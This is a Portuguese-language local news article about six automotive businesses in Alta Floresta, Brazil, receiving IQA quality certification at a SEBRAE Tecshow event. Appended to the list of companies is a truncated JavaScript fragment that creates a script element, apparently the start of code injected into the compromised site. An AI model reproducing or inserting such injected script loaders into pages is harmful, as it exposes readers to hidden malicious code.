Capa / Cidades / Empresas automotivas recebem certificados do IQA

Empresas automotivas recebem certificados do IQA

KODAK Digital Still Camera

Renan Nery e
Dionéia Martins

A SEBRAE em parceria com MTE- THOMSON, e Instituto da Qualidade Automotiva (IQA) realizou nesta terça feira, 1º, o evento Tecshow, no auditório da Praça da Cultura de Alta Floresta, com a palestra sobre Motores 3 Cilindros reuniu donos de oficinas mecânicas, técnicos, interessados e apaixonados por carro .
Esse evento vem de encontro as necessidades do mercado que a cada dia exige mais qualidade, seja no serviço ou no atendimento. Buscando se qualificar para ficar mais competitivo no mercado seis empresas do setor automotivo de Alta Floresta buscaram junto ao Sebrae o selo do IQA.
O empresário Ozires Antonio Rodriges, que tem no seu quadro funcional 32 colaborares, buscou o selo de qualidade para melhorar o atendimento. “Realmente esse selo de qualidade, essa certificação vem coroar o trabalho de muitos anos, buscando sempre pela excelência, pela qualidade, pelo melhor atendimento ao cliente e qualidade dos colaboradores”, ressaltou Ozires.
Segundo Ozires, esse padrão de qualidade é hoje exigido pelo mercado, se antes um mecânico andava sujo de graxa, hoje isso já não acontece, o cuidado com o veículo do cliente é fundamental. Fornecer serviços com qualidade é fundamental para satisfazer o cliente.
“Hoje nós temos que ter uma aparência boa para atender o cliente , para entrar dentro o carro do cliente tem que ter a proteção, hoje o cliente busca a qualidade”, pontuou.
O comprometimento da equipe é resultado da capacitação oferecida, o aprimoramento dos processos de gestão e qualidade, são algumas das etapas que as empresas percorrem até alcançar o selo.
A certificação do IQA é exclusiva do setor automotiva, os empresários de Alta Floresta entraram no projeto em 2012, e desde lá tiveram que atender a todos os critérios para conseguir o selo que tem validade de um ano, após esse período, uma nova auditoria é feita para ter certeza que a empresa continua seguindo os critérios e colocando em prática, para poder renovar o selo que é atestado pelo Inmetro.
O gestor do setor automotivo do Sebrae, Wellington Pereira, ressaltou que Alta Floresta está no mesmo patamar em termos de qualificação que os grandes centros, e que o resultados dessas mudanças vem da demanda do mercado. ” As empresas que não inovar, não procurarem se modernização e atualizar eles vão perder cliente, alertou o gestor.
O selo IQA é um dos mais importantes e reconhecidos do setor automotivo e mercado, cujos parâmetros são pautados pelo Sistema Brasileiro de Avaliação de Conformidade. O IQA é acreditado pelo Instituto Nacional de Metrologia (Inmetro).
O evento da entrega da certificação IQA, contou com palestras sobre motores de 3 cilindros, mesa técnica, e presença de técnicos especialistas a disposição do público.
As seis empresas certificadas no evento foram: Auto Elétrica Líder; Cromo Diesel; Força Hidráulica; Pneunorte; Retibras; e Rodcar/ Camionetecar.var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top